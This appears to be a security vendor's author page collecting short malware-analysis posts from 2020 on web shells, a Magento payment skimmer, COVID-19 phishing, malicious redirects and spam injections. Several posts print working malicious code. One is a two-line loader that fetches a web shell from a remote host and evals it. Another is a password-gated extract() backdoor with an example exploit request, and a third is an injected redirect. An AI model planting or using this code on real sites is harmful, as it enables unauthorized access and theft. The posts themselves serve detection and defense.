Author: Luke Leal

Luke is a Malware Researcher at Sucuri. He enjoys boosting his desktop computer's performance and credits gaming with building his initial interest into anything computer related. When not saving websites, he likes to go on nature hikes or watch YouTube.

B374k Web Shell Packer

PHP web shells are a type of backdoor which, when left on compromised websites, allow attackers to maintain unauthorized access after initial compromise.

To further evade detection, attackers may also choose to keep a packer script on a compromised website instead of the actual PHP web shell. They can then use this script to generate the PHP web shell on an as-needed basis.

One of the more common PHP web shells is b374k.php. It’s popular with bad actors because it offers a lot of features including a file manager, database connect, various text conversions, and email via PHP.

Let’s take a look at how attackers can load b374k.php with a packing script, seen below.

unknown shell packer

This unknown shell packer offers a few different options to the attacker:

  • Output - Defines the filename of the PHP web shell to be created
  • Password - Sets a password used to limit access to the PHP web shell
  • Module - Optional features that can be enabled: convert, database, info, mail, network, processes
  • Theme - Optional color theme
  • Strip Comments and Whitespaces - Removes unneeded code comments and whitespaces
  • Base64 Encode - encodes the PHP web shell’s code with base64
  • Compress - Compresses the PHP code with various PHP functions like gzdeflate, gzencode, gzcompress. This feature requires the code to have already been base64 encoded.

Attackers can also run the packer by submitting the parameters through PHP CLI, if available.

cli for b374k packer

Regardless of whether the attacker opts for the PHP CLI or the browser GUI, the result is a generated PHP shell with the chosen filename — in this case unknown.php — which is dropped in the current directory.

interface for b374k packer

These types of malicious scripts can be found planted anywhere within a website’s environment, so the best way to mitigate threat is to prevent unauthorized access to your website in the first place. Practice strong password security principles and use a firewall to prevent a password from brute force.

May 13, 2020 by Luke Leal

Magento JavaScript Skimmer Targets Tarjetas de Crédito

A website owner recently contacted us regarding a payment problem on their Magento website. A suspicious payment card form was loading for customers who were trying to pay for items in their shopping cart:

suspicious payment card form

This payment card form should NOT be displayed when the Tarjeta de Credito DISCOVER radio button is selected from the purchase process. The malicious "feature" was found to be loading due to an injection using the Javascript .click() event on the onestepcheckout-place-order element. This injection allows attackers to display their form and skim payment card details as they are entered.

injection allowing attackers to display the malicious form and skim credit card information

To exfiltrate the skimmed payment card data, the injection continues to use Javascript to encode data and send it to the malicious domain cdn-filestore[.]com, which itself is encoded in base64 to evade detection. All of this is accomplished through a Javascript function defined in the injection under the name onestepcheckout_payment():

function defined in malicious injection

After removing the malicious injection, the skimmer form no longer shows up on the checkout page of the Magento website. Instead, it shows the correct text and behavior which informs customers that they will be redirected to the payment processor’s website after submitting their order.

redirect to payment processor

It’s imperative that Magento websites take e-commerce security seriously, as they are responsible for customer data and breaches of transaction data on their online store. Perform regular security scans to detect infections, identify malware, and pinpoint other indicators of compromise.

Apr 17, 2020 by Luke Leal

Phishing with a COVID-19 Lure

It’s not uncommon to see criminals use disasters or current events to enhance their social engineering tactics, and the recent COVID-19 pandemic is no different. During a recent investigation, we received an email originating from 69.112.92.34 (x-originating-ip: [69.112.92.34]) with a [redacted]@[redacted].k12.ct.us email address and the following message body:

 

 
Due to the recent COVID-19 outbreak, IT Helpdesk is currently working on advance Staff portal in order to keep our staff/employee on task & organized schedules.
All Staff/Employee are required to update their Staff Portal.

To access the portal, Click on STAFF PORTAL for update.

Failure to update your Staff portal, you will be deleted from our database.

Sincerely,

IT Helpdesk

©2020 Microsoft outlook.

All rights reserved

The malicious user is employing the COVID-19 crisis to provide credibility as to why the impersonated IT Helpdesk would need the victim to update their personal information.

When clicked, the PORTAL link directs victims first to the URL shortener service bit.ly and then passed them along to the malicious phishing subdomain designmysite[.]pro:

COVID-19 Phishing Lure 

hxxps://bit[.]ly/2Qu0dMZ
⤋
hxxp://8li9c1sr9queececshfj5lulh.designmysite[.]pro

The subdomain 8li9c1sr9queececshfj5lulh.designmysite[.]pro was disabled before I could properly load it, however this is not the first phishing scam attempted by this domain. Continuing my research, I found another phishing page on a similar subdomain 6bsy904ldphremdrtt0pixql9.designmysite[.]pro:

As seen in the malicious COVID-19 phishing campaign, this particular phishing form is also disseminated through a bit.lyb> shortened URL. What’s more, there are multiple reports going all the way back to 2018 which show designmysite[.]pro spoofing or compromising existing educator email addresses:

When viewing the source of the phishing forms, it becomes clear that the email address spamingboxtool101@outlook.com is being used to collect the phished information submitted by victims: 

"widget":{},"uniqueId":"Ajj7NKp9ACuwjMj","parentUniqueId":"ffpV5Q4d2ksrav0"},"page-zones__main-widgets__responsivecolumns1-zones__5e654f40427e2-widgets__5e654f405b223":{"ref":"5921879","uniqueHTMLId":"page-zones__main-widgets__responsivecolumns1-zones__5e654f40427e2-widgets__5e654f405b223","name":"5e654f405b223","fixed":false,"libraryItemRef":"0","pageRef":"1910011","temporary":{},"changed":{},"type":"widget.advancedcontactform","data":{"email":"spamingboxtool101@outlook.com","text":"Send","formTitle":"box","fromEmailLabel":"Your email:","fromEmailPlaceholder":"Type your email","collectEmailAddress":"1","localClass":"widget-advancedcontactform-84336F","uniqueId":"c7Z6hf92oPJCEEC","formFields":[{"title":"Full Name","type":"singleline","options":[],"mandatory":1,"id":"c7acbb10-6177-11ea-96dc-65cdea8475cd","order":1}...

This recent investigation clearly demonstrates why it’s important to keep an eye out for phishing campaigns – as well as misinformation in general. Familiarize yourself with the steps you can take to recognize a phishing campaign and avoid becoming a victim.

Apr 6, 2020 by Luke Leal

Fake License.txt File Loaded Through PHP Include

Our team recently found a malicious injection located within a PHP include. The redirect occurs via the include function, which includes a file inconspicuously named license.txt.

During our investigation, we located the license.txt injected within header.php of the WordPress theme file. 

include('license.txt'); ?>
        </header> <!-- #main-header -->
    <?php
        $main_header = ob_get_clean();

        /**
         * Filters the HTML output for the main header.
         *
         * @since ??
         *
         * @param string $main_header
         */
        echo apply_filters( 'et_html_main_header', $main_header );
    ?>
        <div id="et-main-area">
    <?php
        /**
         * Fires after the header, before the main content is output.
         *
         * @since ??
         */
        do_action( 'et_before_main_content' );

The license.txt file is essentially a redirect to send site visitors to a malicious domain, which uses HTML to generate a redirect to the malicious website https://times2day[.]com, and was registered on February 6th, 2020. 

<?php
<html>
<meta http-equiv="X-UA-Compatible"
content="IE-Edge">
   <meta name="viewport" content="width=device-width,
initial scale=1">
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
   <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
   </script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js">
    </script>
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
</head>
<body>
<script>
swal({
    title: 'Oh, you must be visiting us!!!! ',
    text: 'Getting access..... ',
    icon: 'success',
    timer: 2000,
    buttons: false,
})
.then(() => {
    window.location.href = "https://times2day.com/";
})
</script>
</body>
</html>

?>

To detect these types of malicious injections, site owners can scan websites for known malware, blacklisting status, website errors, out-of-date software, and malicious code.

Apr 3, 2020 by Luke Leal

Face Mask Spam Links Injected in WordPress Database

During a recent malware removal request, we found a compromised WordPress site being used to redirect to spam websites. The campaign was leveraging an increase in search queries related to face masks.

To make their campaign more difficult to detect and boost SEO rankings, the attackers use a multitude of compromised third-party websites to funnel their traffic. They also use the World Health Organization name and images to add credibility to their campaign.

World Health Organization spam image

Spam links are injected into the widgets section of the wp_options database, resulting in the compromised environment linking to third-party sites trying to rank for face mask search terms.

Face mask spam links

The spam links have been set to conceal themselves from website visitors using <div style="display:none;">, all of which lead to the Shopify website https://lundybright[.]fr/ which was registered on March 2nd.

Compromised websites impacted by this spam campaign can use our hacked website cleanup guide to remove the infection.

Apr 2, 2020 by Luke Leal

Tiny WSO Webshell Loader

A PHP webshell is a common tool found on compromised environments. Attackers use webshells as backdoors, allowing them to maintain unauthorized access to a hacked website.

Bad actors can also use webshells to perform various functions within a single PHP file, which they typically create after their initial exploit of the website. Some of these functions include obtaining sensitive details on a web server’s configuration, file management, SQL connections, and additional backdoor payloads like reverse shells.

It’s usually unnecessary for an attacker to create their own custom PHP webshell. Instead, they often use PHP webshells which are readily available and popular within hacking communities, including WSO, c99, B347K, and r57.

Here's what a WSO PHP webshell loaded within a browser looks like:

PHP Webshell in browser

Since PHP webshells are common on hacked websites, they are susceptible to being detected by server side scanning tools. The capabilities of a PHP webshell also require more code, meaning there’s a larger disk footprint when compared to existing legitimate PHP files used by the website.

Besides their large disk usage, the webshell’s code also contains PHP code that is easy for scanners to detect. For example, when the PHP code contains a FilesMan reference: 

session_start();
$password = "";
$passtype = "";
$color = "#df5";
$default_action = 'FilesMan';

This WSO PHP webshell variant contains over 1,900 lines of PHP code in total. Its larger-than-normal file size is a red flag for scanning technologies — leading hackers to leverage methods which prevent them from storing all of the PHP webshell’s code on the hacked website’s file system.

So, what is one method that a hacker can employ to upload a webshell to a hacked website without actually storing the code within the website’s file structure? They can use file_get_contents method, as seen in this small WSO webshell loader found on a hacked website. 

session_start<?php
$a = file_get_contents('https://[REDACTED]/files/readme.txt');
eval('?>'.$a);

This method effectively reduces a 1,900+ line PHP webshell into just two lines of PHP code. It simply assigns a variable, $a, with the output of the file_get_contents function which is used to grab the PHP webshell’s source code from a third party location. It then stores it in memory, rather than a file on disk.

Next, the loader uses eval to execute the stored PHP code in the $a variable, loading the webshell without having to store the entire code within the website’s file system.

You may wonder why the PHP webshell’s code exists as a .txt file on the third party website. This is because if it were using its native .php file extension, then the third party website server would execute the PHP webshell’s code rather than downloading the code’s text requested with file_get_contents. This also requires the webshell loader’s eval function to use a closing tag/EOF, preventing syntax errors when loading the webshell PHP code from the third party server.

As webshells operate as a backdoor, they are best detected with file monitoring and the use of a server side scanner. If changes, deletions, or additions to the environment are detected, you’ll be notified of any indicators of compromise.

Mar 24, 2020 by Luke Leal

Extract Function Backdoor Variant

We recently found malware on a client’s WordPress site that was using a variant of a backdoor that we previously covered back in 2014.

The primary difference in this backdoor is that the malware has been formatted so that it is easier to use PHP functions like file_put_contents() to create additional malicious files from code within an attacker’s HTTP request.

A second different characteristic is that the malware requires that the attacker provide a value that will match the MD5 hash defined within the code. If this value is not provided, or if it does not match, then the malware will use die() to stop running and will not proceed. This essentially works as a password so that the malware cannot be used unless the correct ($b) value is known and provided in the HTTP request. That being said, anyone with access to modify the file can simply remove the code checking for the MD5 hash.

The values for the variables ($b, $c, $f, and $a) are provided through the attacker’s HTTP request and passed through the PHP function extract(): 

<?php
extract($_REQUEST);
if (md5($b) != '21232f297a57a5a743894a0e4a801fc3')
{
   die();
}
$c($f, $a);
include_once $f;
?>

The variable structure $c($f, $a) makes it easy to use file_put_contents (not limited to just this function), which allows an attacker to insert virtually any code into a file.

Finally, the last line of the malicious code uses include_once to load the malicious code that was inserted into a file by the attacker.

One primary example of malicious use includes using file_get_contents() to download a PHP web shell. Another example would be using system() to run arbitrary commands like ls for obtaining directory and file listings. 

/sample.php?c=file_put_contents&a=<%3Fphp+system("ls+-lhart")%3B+%3F>&b=admin&f=test.php

PHP Sample

Website owners can use a web application firewall to block malicious requests to this type of injection.

Firewall block page

Mar 18, 2020 by Luke Leal